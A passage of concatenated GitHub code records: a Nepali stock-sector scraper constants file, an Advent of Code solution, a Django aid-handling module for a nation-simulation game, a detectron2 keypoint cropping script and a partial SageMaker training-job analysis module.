\"SDLBSL\", \"value\": 2896},\n {\"name\": \"Swabhimaan Laghubitta Bittiya Sanstha Ltd\", \"symbol\": \"SMFBS\", \"value\": 2829},\n {\"name\": \"SABAIKO LAGHUBITTA BITTIYA SANSTHA LIMITED\", \"symbol\": \"SABSL\", \"value\": 2843},\n {\"name\": \"Aarambha Chautari Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"ACLBSL\", \"value\": 2790},\n {\"name\": \"Unnati Sahakarya Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"USLB\", \"value\": 2774},\n {\"name\": \"Sarathi Nepal Laghubitta Bittiya Sanstha Limited\", \"symbol\": \"SNLB\", \"value\": 592},\n {\"name\": \"Kisan Lagubitta Bittiya Sanstha Limited\", \"symbol\": \"KLBSL\", \"value\": 694},\n {\"name\": \"Meromicrofinance Laghubitta Bittiya Sanstha Limited Promoter Share\", \"symbol\": \"MEROPO\", \"value\": 1742}\n ]\n }),\n \"Hotel\": Box({\n \"file_location\":{\n \"W\":\"../../../../../data/hotel/weekly.json\",\n \"M\": \"../../../../../data/hotel/monthly.json\",\n \"Y\": \"../../../../../data/hotel/yearly.json\",\n \"Q\": \"../../../../../data/hotel/quaterly.json\",\n \"D\": \"../../../../../data/hotel/daily.json\"\n },\n \"links\": [\n {\"name\": \"Oriental Hotels Limited\", \"symbol\": \"OHL\", \"value\": 149},\n {\"name\": \"Soaltee Hotel Limited\", \"symbol\": \"SHL\", \"value\": 147},\n {\"name\": \"Taragaon Regency Hotel Limited\", \"symbol\": \"TRH\", \"value\": 148},\n {\"name\": \"Chandragiri Hills Limited\", \"symbol\": \"CGH\", \"value\": 2917}\n ]\n }),\n 
\"HydroPower\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/hydropower/weekly.json\",\n \"M\": \"../../../../../data/hydropower/monthly.json\",\n \"Y\": \"../../../../../data/hydropower/yearly.json\",\n \"Q\": \"../../../../../data/hydropower/quaterly.json\",\n \"D\": \"../../../../../data/hydropower/daily.json\"\n },\n \"links\": [\n {\"name\": \"Arun Valley Hydropower Development Co. Ltd.\", \"symbol\": \"AHPC\", \"value\": 360 },\n {\"name\": \"Butwal Power Company Limited\", \"symbol\": \"BPCL\", \"value\": 153},\n {\"name\": \"Chilime Hydropower Company Limited\", \"symbol\": \"CHCL\", \"value\": 154},\n {\"name\": \"National Hydro Power Company Limited\", \"symbol\": \"NHPC\", \"value\": 152},\n {\"name\": \"Sanima Mai Hydropower Ltd.\", \"symbol\": \"SHPC\", \"value\": 591},\n {\"name\": \"Ridi Hydropower Development Company Ltd.\", \"symbol\": \"RHPC\", \"value\": 610},\n {\"name\": \"Himalaya Urja Bikas Company Limited\", \"symbol\": \"HURJA\", \"value\": 2824},\n {\"name\": \"Arun Kabeli Power Ltd.\", \"symbol\": \"AKPL\", \"value\": 2757 },\n {\"name\": \"Barun Hydropower Co. Ltd.\", \"symbol\": \"BARUN\", \"value\": 686},\n {\"name\": \"Api Power Company Ltd.\", \"symbol\": \"API\", \"value\": 697},\n {\"name\": \"Ngadi Group Power Ltd.\", \"symbol\": \"NGPL\", \"value\": 2743},\n {\"name\": \"SANJEN JALAVIDHYUT COMPANY LIMITED\", \"symbol\": \"SJCL\", \"value\": 2842},\n {\"name\": \"RASUWAGADHI HYDROPOWER COMPANY LIMITED\", \"symbol\": \"RHPL\", \"value\": 2841},\n {\"name\": \"United Modi Hydropower Ltd.\", \"symbol\": \"UMHL\", \"value\": 2760},\n {\"name\": \"Dibyashwori Hydropower Ltd.\", \"symbol\": \"DHPL\", \"value\": 2754}\n ]\n }),\n \"LifeInsurance\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/lifeinsurance/weekly.json\",\n \"M\": \"../../../../../data/lifeinsurance/monthly.json\",\n \"Y\": \"../../../../../data/lifeinsurance/yearly.json\",\n \"Q\": \"../../../../../data/lifeinsurance/quaterly.json\",\n \"D\": \"../../../../../data/lifeinsurance/daily.json\"\n },\n \"links\": [\n {\"name\": \"Asian Life Insurance Co. Limited\", \"symbol\": \"ALICL\", \"value\": 385},\n {\"name\": \"Gurans Life Insurance Company Ltd.\", \"symbol\": \"GLICL\", \"value\": 447},\n {\"name\": \"Life Insurance Co. Nepal\", \"symbol\": \"LICN\", \"value\": 188},\n {\"name\": \"Nepal Life Insurance Co. Ltd.\", \"symbol\": \"NLIC\", \"value\": 187},\n {\"name\": \"National Life Insurance Co. Ltd.\", \"symbol\": \"NLICL\", \"value\": 178},\n {\"name\": \"Prime Life Insurance Company Limited\", \"symbol\": \"PLIC\", \"value\": 393},\n {\"name\": \"Surya Life Insurance Company Limited\", \"symbol\": \"SLICL\", \"value\": 403},\n {\"name\": \"Jyoti Life Insurance Company Limited\", \"symbol\": \"JLI\", \"value\": 2929},\n {\"name\": \"Reliance Life Insurance Company Limited\", \"symbol\": \"RLI\", \"value\": 2900},\n {\"name\": \"Prabhu Life Insurance Limited\", \"symbol\": \"PLI\", \"value\": 2915},\n ]\n }),\n \"NonLifeInsurance\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/nonlifeinstitution/weekly.json\",\n \"M\": \"../../../../../data/nonlifeinstitution/monthly.json\",\n \"Y\": \"../../../../../data/nonlifeinstitution/yearly.json\",\n \"Q\": \"../../../../../data/nonlifeinstitution/quaterly.json\",\n \"D\": \"../../../../../data/nonlifeinstitution/daily.json\"\n },\n \"links\": [\n {\"name\": \"Everest Insurance Co. Ltd.\", \"symbol\": \"EIC\", \"value\": 181},\n {\"name\": \"Himalayan General Insurance Co. 
Ltd\", \"symbol\": \"HGI\", \"value\": 179},\n {\"name\": \"Lumbini General Insurance Co. Ltd.\", \"symbol\": \"LGIL\", \"value\": 190},\n {\"name\": \"Nepal Insurance Co. Ltd.\", \"symbol\": \"NICL\", \"value\": 176},\n {\"name\": \"Neco Insurance Co. Ltd.\", \"symbol\": \"NIL\", \"value\": 183},\n {\"name\": \"NLG Insurance Company Ltd.\", \"symbol\": \"NLG\", \"value\": 559},\n {\"name\": \"Premier Insurance Co. Ltd.\", \"symbol\": \"PIC\", \"value\": 182 },\n {\"name\": \"Prudential Insurance Co. Ltd.\", \"symbol\": \"PICL\", \"value\": 189},\n {\"name\": \"Sagarmatha Insurance Co. Ltd.\", \"symbol\": \"SIC\", \"value\":185 },\n {\"name\": \"Shikhar Insurance Co. Ltd.\", \"symbol\": \"SICL\", \"value\": 192},\n {\"name\": \"Siddhartha Insurance Ltd.\", \"symbol\": \"SIL\", \"value\": 280},\n {\"name\": \"United Insurance Co. (Nepal) Ltd.\", \"symbol\": \"UIC\", \"value\": 180 },\n {\"name\": \"Prabhu Insurance Ltd.\", \"symbol\": \"PRIN\", \"value\": 184},\n {\"name\": \"Rastriya Beema Company Limited\", \"symbol\": \"RBCL\", \"value\": 177},\n {\"name\": \"IME General Insurance Ltd.\", \"symbol\": \"IGI\", \"value\": 186},\n {\"name\": \"AJOD Insurance Limited\", \"symbol\": \"AIL\", \"value\":2893 },\n {\"name\": \"Sanima General Insurance Company Limited\", \"symbol\": \"SGI\", \"value\":2908 },\n {\"name\": \"General Insurance Company Limited\", \"symbol\": \"GIC\", \"value\": 2905}\n ]\n }),\n \"Trading\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/trading/weekly.json\",\n \"M\": \"../../../../../data/trading/monthly.json\",\n \"Y\": \"../../../../../data/trading/yearly.json\",\n \"Q\": \"../../../../../data/trading/quaterly.json\",\n \"D\": \"../../../../../data/trading/daily.json\"\n },\n \"links\": [\n {\"name\": \"Bishal Bazar Company Limited\", \"symbol\": \"BBC\", \"value\": 156},\n {\"name\": \"Salt Trading Corporation\", \"symbol\": \"STC\", \"value\": 155}\n ]\n }),\n \"Manufacturing\": Box({\n \"file_location\": {\n \"W\":\"../../../../../data/manufacturing/weekly.json\",\n \"M\": \"../../../../../data/manufacturing/monthly.json\",\n \"Y\": \"../../../../../data/manufacturing/yearly.json\",\n \"Q\": \"../../../../../data/manufacturing/quaterly.json\",\n \"D\": \"../../../../../data/manufacturing/daily.json\"\n },\n \"links\": [\n {\"name\": \"Bottlers Nepal (Balaju) Limited\", \"symbol\": \"BNL\", \"value\": 195},\n {\"name\": \"Bottlers Nepal (Terai) Limited\", \"symbol\": \"BNT\", \"value\": 213},\n {\"name\": \"Himalayan Distillery Limited\", \"symbol\": \"HDL\", \"value\": 235},\n {\"name\": \"Nepal Lube Oil Limited\", \"symbol\": \"NLO\", \"value\": 198 },\n {\"name\": \"Shree Raghupati Jute Mills Limited\", \"symbol\": \"RJM\", \"value\": 203},\n {\"name\": \"Unilever Nepal Limited\", \"symbol\": \"UNL\", \"value\": 219},\n {\"name\": \"SHIVAM CEMENTS LTD\", \"symbol\": \"SHIVM\", \"value\": 2809},\n ]\n })\n\n}\n\n","repo_name":"SERPANT/nepse_share_analysis","sub_path":"scraper-daemon/src/Share_scrapy/Share_scrapy/constants/website_link.py","file_name":"website_link.py","file_ext":"py","file_size_in_byte":19905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13182984224","text":"from collections import Counter\n\nwith open(\"08-input.txt\") as file:\n lines = file.readlines()\n lines = [x.split(\"|\")[1].strip() for x in lines]\n counters = Counter({x: 0 for x in range(8)})\n for line in lines:\n for x in line.split():\n a = len(x)\n counters[len(x)] +=1\n\n print(counters)\n 
print(counters[2]+ counters[3] + counters[4] + counters[7])\n ","repo_name":"Rankarusu/AdventOfCode","sub_path":"08-A.py","file_name":"08-A.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"19826345477","text":"from nation.models import Nation, Econdata, Military, Market, Marketofferlog\nfrom nation.variables import min_land\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.db.models import Q, F, Avg\nfrom django.db import transaction\nfrom django.utils import timezone\n\nimport nation.utilities as utils\nimport nation.news as news\nimport nation.variables as v\nfrom nation.forms import ajaxaidform\n\n\n@login_required\ndef incoming(request):\n #takes incoming aid requests in AJAX format\n #checks if sender and recipient are even eligible\n #then we either deny the request or hand control to the appropriate function\n if Nation.objects.actives().filter(Q(pk=request.POST['target'])|Q(user=request.user)).exists():\n return delegate(request)\n return JsonResponse({'result': \"'no'\"})\n\n@transaction.atomic\ndef delegate(request):\n options = {\n 'aid': send_aid,\n 'weapons': give_weapons,\n 'cede': cede,\n 'expedition': expeditionary,\n 'uranium': uranium,\n 'research': research,\n 'nuke': nukes,\n }\n mils = ['nuke', 'weapons', 'expedition']\n if request.POST['action'] in mils:\n Military.objects.select_for_update().filter(Q(nation__user=request.user)|Q(nation__pk=request.POST['target']))\n nation = Nation.objects.select_for_update().get(user=request.user)\n target = Nation.objects.select_for_update().get(pk=request.POST['target'])\n if nation.pk == target.pk:\n return JsonResponse({'result': '\"no\"'})\n if request.POST['action'] in options:\n args = {'nation': nation, 'target': target, 'POST': request.POST}\n result = options[request.POST['action']](**args)\n else:\n result = {'result': 'NO'}\n return JsonResponse(result)\n\n\ndef send_aid(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n POST = kwargs.pop('POST')\n form = ajaxaidform(nation, POST)\n if form.is_valid():\n resource = form.cleaned_data['resource']\n if resource in v.resources:\n aid_amount = form.cleaned_data['amount']\n if nation.outgoing_aidspam.filter(\n reciever=target, \n resource=resource, \n amount=aid_amount, \n timestamp__gte=v.now() - timezone.timedelta(minutes=10)\n ).count() > 5:\n return {'result': 'no'}\n market = Market.objects.latest('pk')\n tariff = 0\n if (nation.economy < 33 and target.economy > 66) or (target.economy < 33 and nation.economy > 66):\n tariff += 10\n if (nation.alignment == 3 and target.alignment == 1) or (target.alignment == 3 and nation.alignment == 1):\n tariff += 10\n if resource != 'budget':\n tariff = aid_amount * tariff\n tb = market.__dict__['%sprice' % resource] * aid_amount\n else:\n tariff = (int(aid_amount * 0.1) if tariff > 0 else 0)\n tb = aid_amount\n nation.__dict__[resource] -= aid_amount\n target.__dict__[resource] += aid_amount\n nation.trade_balance -= tb\n target.trade_balance += tb\n news.aidnews(nation, target, resource, aid_amount)\n #to decrease clutter, merge aidlogs < 10 minutes old\n #so instead of 2x $9999k aid logs, it's 1x $19998k log\n nation.outgoing_aidspam.create(resource= resource, reciever=target, amount=aid_amount)\n result = \"%s has recieved %s!\" % (target.name, v.pretty(aid_amount, resource))\n #feeeeees :D\n uf = [resource, 'trade_balance']\n if tariff 
> 0:\n result += " But the differences between our systems resulted in $%sk in tariffs!" % tariff\n nation.budget -= tariff\n if resource != 'budget':\n uf.append('budget')\n nation.save(update_fields=uf)\n target.save(update_fields=uf)\n log_aid(nation, target, resource, aid_amount)\n result = {'result': result, 'update': True}\n else:\n result = {'result': 'invalid resource'}\n else:\n try:\n result = {'result': form.errors.as_data()['amount'][0][0]}\n except:\n result = {'result': 'invalid resource'}\n return result\n\n\ndef give_weapons(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.military.weapons < 15:\n result = "We barely have any weapons as it is! We can't give any away!"\n elif utils.opposing_alignments(nation, target):\n result = "We cannot give weapons to nations aligned with the %s!" % v.alignment[target.alignment]\n elif nation.military.weapons < 100 and target.military.weapons > 300:\n result = "Our equipment is worthless compared to what they have!"\n else:\n nation.military.weapons -= 5\n target.military.weapons += 5\n nation.military.save(update_fields=['weapons'])\n target.military.save(update_fields=['weapons'])\n if nation.has_alliance() and target.has_alliance():\n if nation.alliance == target.alliance and nation.alliance.initiatives.weapontrade:\n pass\n else:\n nation.reputation -= 2\n nation.save(update_fields=['_reputation'])\n news.sending_weapons(nation, target)\n log_aid(nation, target, 'weapons', 5)\n return {'result': "The weapons are packed in crates and shipped off. The UN didn't seem too happy.",\n 'update': True,\n }\n return {'result': result}\n\n\ndef cede(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.land < 10100:\n result = "You do not have enough land to cede!"\n elif nation.region() != target.region():\n result = "We cannot cede land to a country in a different part of the world!"\n elif nation.stability < 20 or nation.approval < 20:\n result = "The people already hate you! 
Ceding land might result in your death!\"\n elif nation.econdata.cedes == 3:\n result = \"We can't cede land more than 3 times a month!\"\n else:\n nation.stability -= 10\n nation.approval -= 10\n nation.land -= 100\n nation.save(update_fields=['_stability', '_approval', 'land'])\n target.land += 100\n target.save(update_fields=['land'])\n result = \"We cede the land and lose respect of the people!\"\n news.ceding_territory(nation, target)\n log_aid(nation, target, 'land', 100)\n return {'result': result}\n\n\ndef expeditionary(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.econdata.expedition:\n result = \"You have already sent an expeditionary force this turn!\"\n elif utils.opposing_alignments(nation, target):\n result = \"We cannot send troops to nations aligned with the %s!\" % v.alignment[target.alignment]\n elif nation.military.army < 10:\n result = \"You do not have enough active personnel for this!\"\n else:\n nation.military.army -= 10\n target.military.army += 10\n nation.military.save(update_fields=['army'])\n target.military.save(update_fields=['army'])\n Econdata.objects.filter(nation__pk=nation.pk).update(expedition=True)\n news.aidnews(nation, target, 'troops', 10)\n log_aid(nation, target, 'troops', 10)\n result = \"10k of our active personnel are shipped off to %s\" % target.name\n return {'result': result}\n\n\ndef nukes(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.military.nukes == 0:\n result = \"You have no nukes to send!\"\n else:\n nation.reputation -= 50\n nation.save(update_fields=['_reputation'])\n nation.military.nukes -= 1\n target.military.nukes += 1\n nation.military.save(update_fields=['nukes'])\n target.military.save(update_fields=['nukes'])\n news.nukesent(nation, target)\n log_aid(nation, target, 'nukes', 1)\n result = \"A nuclear bomb is carefully disgused and transported to %s\" % target.name\n return {'result': result}\n\n\ndef research(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.research < 50:\n return {'result': \"stop it\"}\n else:\n nation.research -= 50\n target.research += 50\n nation.save(update_fields=['research'])\n target.save(update_fields=['research'])\n news.aidnews(nation, target, 'research', 50)\n log_aid(nation, target, 'research', 50)\n return {'result': \"50 research gets transferred to %s!\" % target.name, 'update': True}\n\n\ndef uranium(*args, **kwargs):\n nation = kwargs.pop('nation')\n target = kwargs.pop('target')\n if nation.uranium < 1:\n result = \"You do not have any uranium!\"\n else:\n nation.uranium -= 1\n nation.reputation -= 5\n target.uranium += 1\n nation.save(update_fields=['uranium', '_reputation'])\n target.save(update_fields=['uranium'])\n news.uraniumaid(nation, target)\n log_aid(nation, target, 'uranium', 1)\n result = \"You send off the yellow cake to %s\" % target.name\n return {'result': result} \n\n\ndef log_aid(nation, target, resource, amount):\n value = get_value(resource, amount)\n query = nation.outgoing_aid.filter(\n resource=resource,\n reciever=target,\n timestamp__gte=v.now() - timezone.timedelta(minutes=10))\n if query.exists():\n query.update(amount=F('amount') + amount, value=F('value') + value)\n else:\n nation.outgoing_aid.create(reciever=target, resource=resource, amount=amount, value=value)\n\n #now for action logging\n query = nation.actionlogs.filter(\n action='Sent aid',\n extra=resource,\n timestamp__gte=v.now() - 
timezone.timedelta(minutes=10))\n if query.exists():\n query.update(amount=F('amount') + 1)\n else:\n nation.actionlogs.create(action='Sent aid', extra=resource)\n\n\ndef get_value(resource, amount):\n if resource == \"budget\":\n return amount\n if resource == \"land\":\n return amount * 100\n if resource == \"nukes\": \n return 5000*25\n if resource == \"uranium\" or \\\n resource == \"troops\" or \\\n resource == \"research\" or \\\n resource == \"weapons\":\n minimums = {'uranium': 5000, 'troops': 1500, 'research': 400, 'weapons': 500}\n if Marketofferlog.objects.filter(sold=resource).exists():\n value = Marketofferlog.objects.filter(sold=resource)[0:20].aggregate(\n Avg('unitprice'))['unitprice__avg']\n if value < minimums[resource]:\n value = minimums[resource]\n else:\n value = minimums[resource]\n return value * amount\n price = getattr(Market.objects.latest(), \"%sprice\" % resource)\n return price * amount","repo_name":"argiepras/Coco","sub_path":"aid.py","file_name":"aid.py","file_ext":"py","file_size_in_byte":11003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39504037108","text":"import cv2\nimport torch\nimport numpy as np\n\nfrom detectron2.config import get_cfg\nfrom detectron2.data.detection_utils import read_image\nfrom detectron2.engine.defaults import DefaultPredictor\n\ndef detect_parts():\n confidence_threshold = 0.7\n image_path = 't.jpg'\n config_file = '../configs/COCO-Keypoints/keypoint_rcnn_R_50_FPN_3x.yaml'\n opts = ['MODEL.WEIGHTS',\n 'detectron2://COCO-Keypoints/keypoint_rcnn_R_50_FPN_3x/137849621/model_final_a6e10b.pkl',\n 'MODEL.DEVICE', 'cpu']\n cfg = get_cfg()\n cfg.merge_from_file(config_file)\n cfg.merge_from_list(opts)\n cfg.MODEL.RETINANET.SCORE_THRESH_TEST = confidence_threshold\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = confidence_threshold\n cfg.MODEL.PANOPTIC_FPN.COMBINE.INSTANCES_CONFIDENCE_THRESH = confidence_threshold\n cfg.freeze()\n\n img = read_image(image_path, format=\"BGR\")\n image = cv2.imread(image_path)\n\n predictor = DefaultPredictor(cfg)\n predictions = predictor(img)\n\n keypoints = predictions[\"instances\"].pred_keypoints[0]\n for idx, keypoint in enumerate(keypoints):\n # draw keypoint\n x, y, prob = keypoint\n if prob > 0.05:\n if idx == 12:\n startX = x\n startY = y\n if idx == 15:\n endY = y\n if idx == 11:\n endX = x\n\n startX = startX.type(torch.int64)\n startY = startY.type(torch.int64)\n endY = endY.type(torch.int64)\n endX = endX.type(torch.int64)\n crop_img = image[startY:endY, startX - 20:endX + 20]\n cv2.imshow('imagex', crop_img)\n cv2.waitKey(0)\n\ndetect_parts()","repo_name":"mohamedosama27/online-fitting-room","sub_path":"fitting/demo/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":1626,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"12719214703","text":"from __future__ import annotations\nimport datetime\nimport json\nimport logging\nimport re\nimport shutil\nimport tempfile\nimport time\nfrom collections import Counter\nfrom functools import cached_property, lru_cache\nfrom pathlib import Path\nfrom typing import Any, Callable, cast, Dict, Iterator, List, Tuple, Union\nimport boto3\nimport numpy as np\nfrom botocore.exceptions import ClientError\nfrom .session import default_session\n\n\n# -------------------------------------------------------------------------------------------------\nclass Artifact:\n \"\"\"\n An artifact manages an untarred model artifact of a 
training job. More\n precisely, it manages a local temporary directory which contains all files\n stored as artifacts.\n\n The artifact ought to be used within a `with` statement. Upon exit, the temporary directory is\n cleaned up.\n\n Attributes:\n path: The path of the artifact's managed directory.\n \"\"\"\n\n def __init__(self, path: Path, cleanup: bool):\n \"\"\"\n Initializes a new artifact in the specified directory.\n\n **Note: Do not call this initializer yourself. It is merely returned when accessing the\n artifacts of a training job.**\n \"\"\"\n self.path = path\n self.cleanup = cleanup\n\n def __enter__(self) -> Artifact:\n return self\n\n def __exit__(self, exc_type: Any, exc_val: Any, exc_tb: Any) -> None:\n if self.cleanup:\n shutil.rmtree(self.path)\n\n\n# -------------------------------------------------------------------------------------------------\nclass TrainingJob:\n \"\"\"\n A training job represents a Sagemaker training job within an experiment.\n \"\"\"\n\n def __init__(self, info: Any):\n \"\"\"\n Initializes a new training job, using the specified boto3 session.\n\n **Note: This method should only be called in the context of an Analysis object. Do not use\n this initializer yourself.**\n \"\"\"\n self.info = info\n\n @property\n def name(self) -> str:\n \"\"\"\n Returns the name of the training job.\n \"\"\"\n return self.info[\"TrainingJobName\"]\n\n @property\n def status(self) -> str:\n \"\"\"\n Returns the status of the training job.\n \"\"\"\n return self.info[\"TrainingJobStatus\"]\n\n @property\n def date_created(self) -> datetime.datetime:\n \"\"\"\n Returns the date and time when the training job was created.\n \"\"\"\n return self.info[\"CreationTime\"]\n\n @property\n def hyperparameters(self) -> dict[str, Any]:\n \"\"\"\n Returns all user-defined hyper parameters.\n \"\"\"\n return {\n k: _process_hyperparameter_value(v)\n for k, v in self.info[\"HyperParameters\"].items()\n if not k.startswith(\"sagemaker_\")\n and not k.endswith(\"_output_distribution\")\n }\n\n @lru_cache()\n def pull_logs(self) -> list[str]:\n \"\"\"\n Pulls the training job's logs such that subsequent accesses to the\n `logs` property are noops.\n \"\"\"\n # Check if the logs are already available locally\n log_file = self._cache_dir() / \"logs.txt\"\n if log_file.exists():\n with log_file.open(\"r\") as f:\n return f.read().split(\"\\n\")\n\n # If not, fetch them\n client = default_session().client(\"logs\")\n streams = client.describe_log_streams(\n logGroupName=\"/aws/sagemaker/TrainingJobs\",\n logStreamNamePrefix=self.info[\"TrainingJobName\"],\n )\n res = []\n for stream in streams[\"logStreams\"]:\n params = {\n \"logGroupName\": \"/aws/sagemaker/TrainingJobs\",\n \"logStreamName\": stream[\"logStreamName\"],\n \"startFromHead\": True,\n }\n result = client.get_log_events(**params)\n res.extend([event[\"message\"] for event in result[\"events\"]])\n while \"nextForwardToken\" in result:\n next_token = result[\"nextForwardToken\"]\n result = client.get_log_events(nextToken=next_token, **params)\n if result[\"nextForwardToken\"] == next_token:\n # The same token as before indicates end of stream, see\n # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/logs.html#CloudWatchLogs.Client.get_log_events\n break\n res.extend([event[\"message\"] for event in result[\"events\"]])\n\n # Store them\n log_file.parent.mkdir(parents=True, exist_ok=True)\n with log_file.open(\"w\") as f:\n f.write(\"\\n\".join(res))\n\n # And return them\n return res\n\n 
@property\n def logs(self) -> list[str]:\n \"\"\"\n Retrieves the logs emitted by this training job.\n \"\"\"\n # We can't put the `pull_logs` code here directly since `cached_property` seems to be CPU-\n # bound for some odd reason.\n return self.pull_logs()\n\n @cached_property\n def metrics(self) -> dict[str, np.ndarray]:\n \"\"\"\n Fetches the metrics defined by the training script from the training\n job's logs.\n\n For each metric, it returns a 1D NumPy array (ordered chronologically).\n \"\"\"\n # Check if the logs are already available locally\n metrics_file = self._cache_dir() / \"metrics.json\"\n if metrics_file.exists():\n with metrics_file.open(\"r\") as f:\n return {\n k: np.array(v, dtype=np.float32)\n for k, v in json.load(f).items()\n }\n\n # If not, get them from the logs, write them to the file system and return\n metrics = {\n metric[\"Name\"]: [\n float(x)\n for x in re.findall(metric[\"Regex\"], \"\\n\".join(self.logs))\n ]\n for metric in self.info[\"AlgorithmSpecification\"][\n \"MetricDefinitions\"\n ]\n }\n with metrics_file.open(\"w+\") as f:\n json.dump(metrics, f)\n\n # Return them as numpy arrays\n return {k: np.array(v, dtype=np.float32) for k, v in metrics.items()}\n\n def artifact(self, cache: bool = True) -> Artifact:\n \"\"\"\n Retrieves the model artifact from S3 and stores it locally in a\n temporary directory.\n\n Args:\n cache: Whether to cache the extracted artifact.\n\n Returns:\n The artifact which contains the untarred model artifact directory. The artifact should\n be wrapped in a `with` statement such that the directory is cleaned up after usage.\n \"\"\"\n cache_dir = self._cache_dir() / \"artifacts\"\n\n # First, we check whether the model is already available locally. For this, the `cache`\n # flag is irrelevant\n if cache_dir.exists():\n return Artifact(cache_dir, cleanup=False)\n\n # If not, we need to download the artifact. 
For that, we need to get the bucket and object\n # path\n regex = r\"^s3://([A-z0-9-_]*)/(.*)$\"\n bucket_name, object_path = re.findall(\n regex, self.info[\"ModelArtifacts\"][\"S3ModelArtifacts\"]\n )[0]\n\n # Then, we can download the model\n s3 = default_session().client(\"s3\")\n with tempfile.NamedTemporaryFile(suffix=\".tar.gz\") as tmp:\n s3.download_fileobj(bucket_name, object_path, tmp)\n tmp.seek(0)\n # As soon as it is downloaded, we can unpack the tar into the cache directory or a\n # temporary one\n if cache:\n cache_dir.mkdir(exist_ok=True, parents=True)\n target = cache_dir\n else:\n target = Path(tempfile.mkdtemp())\n shutil.unpack_archive(tmp.name, target)\n\n # And return the artifact\n return Artifact(target, cleanup=not cache)\n\n def move_to(self, experiment: str) -> None:\n \"\"\"\n Updates the experiment tag to the provided name.\n \"\"\"\n client = default_session().client(\"sagemaker\")\n client.add_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n Tags=[{\"Key\": \"Experiment\", \"Value\": experiment}],\n )\n\n def delete(self) -> None:\n \"\"\"\n Deletes the training job by removing all tags associated with it.\n \"\"\"\n client = default_session().client(\"sagemaker\")\n\n existing_tags = client.list_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n MaxResults=100,\n )\n experiment = [\n t[\"Value\"]\n for t in existing_tags[\"Tags\"]\n if t[\"Key\"] == \"Experiment\"\n ][0]\n\n client.add_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n Tags=[{\"Key\": \"OriginalExperiment\", \"Value\": experiment}],\n )\n\n client.delete_tags(\n ResourceArn=self.info[\"TrainingJobArn\"],\n TagKeys=[\"Experiment\"],\n )\n\n def __repr__(self) -> str:\n return f\"TrainingJob(name={self.info['TrainingJobName']})\"\n\n def _cache_dir(self) -> Path:\n return (\n Path.home()\n / \"tsbench\"\n / \"cache\"\n / cast(str, self.info[\"TrainingJobName\"])\n )\n\n\n# -------------------------------------------------------------------------------------------------\nclass Analysis:\n \"\"\"\n The analysis object allows analyzing a set of training jobs that belong to\n the same experiment.\n \"\"\"\n\n def __init__(\n self,\n experiment: str,\n only_completed: bool = True,\n include: Callable[[TrainingJob], bool] = lambda _: True,\n resolve_duplicates: bool = True,\n ):\n \"\"\"\n Initializes a new analysis object, using the specified session to make\n requests to AWS and Sagemaker. The initializer already fetches all\n training jobs belonging to the provided experiment.\n\n Args:\n session: The session to interact with AWS services.\n experiment: The name of the experiment to analyze.\n only_completed: Whether to ignore runs which have not completed successfully (a\n warning will be emitted nonetheless).\n include: Whether the training job should be included in the summary. By default, it\n returns True for any job. 
If `only_completed` is set to True, only completed jobs\n will be passed to this callback.\n resolve_duplicates: Whether to exclude the older experiments if experiments with the\n same hyperparameters are found.\n \"\"\"\n self.experiment_name = experiment\n training_jobs, duplicates = _fetch_training_jobs(\n default_session(),\n self.experiment_name,\n only_completed,\n resolve_duplicates,\n )\n self.duplicates = duplicates\n self.map = {t.name: t for t in training_jobs if include(t)}\n if len(self.map) < len(training_jobs):\n logging.warning(\n \" Analysis manually excludes %d jobs\",\n len(training_jobs) - len(self.map),\n )\n\n def get(self, name: str) -> TrainingJob:\n \"\"\"\n Returns the training job with the specified name.\n \"\"\"\n return self.map[name]\n\n @property\n def status(self) -> dict[str, int]:\n \"\"\"\n Returns the aggregate statistics about the status of all jobs.\n \"\"\"\n c = Counter([t.status for t in self.map.values()])\n return dict(c)\n\n def __iter__(self) -> Iterator[TrainingJob]:\n return iter(self.map.values())\n\n def __len__(self) -> int:\n return len(self.map)\n\n def __repr__(self) -> str:\n return (\n f\"Analysis(experiment='{self.experiment_name}',\"\n f\" num_jobs={len(self):,})\"\n )\n\n\n# -------------------------------------------------------------------------------------------------\ndef _fetch_training_jobs(\n session: boto3.Session,\n experiment: str,\n only_completed: bool,\n resolve_duplicates: bool,\n) -> tuple[list[TrainingJob], list[TrainingJob]]:\n \"\"\"\n Fetches all training jobs which are associated with this experiment.\n \"\"\"\n client = session.client(\"sagemaker\")\n search_params = {\n \"MaxResults\": 100,\n \"Resource\": \"TrainingJob\",\n \"SearchExpression\": {\n \"Filters\": [\n {\n \"Name\": \"Tags.Experiment\",\n \"Operator\": \"Equals\",\n \"Value\": experiment,\n }\n ],\n },\n }\n\n while True:\n try:\n response = client.search(**search_params)\n break\n except ClientError:\n time.sleep(1)\n\n results = response[\"Results\"]\n while \"NextToken\" in response:\n while True:\n try:\n response = client.search(\n NextToken=response[\"NextToken\"], **search_params\n )\n results.extend(response[\"Results\"])\n break\n except ClientError:\n time.sleep(1)\n\n jobs = [TrainingJob(r[\"TrainingJob\"]) for r in results]\n\n if 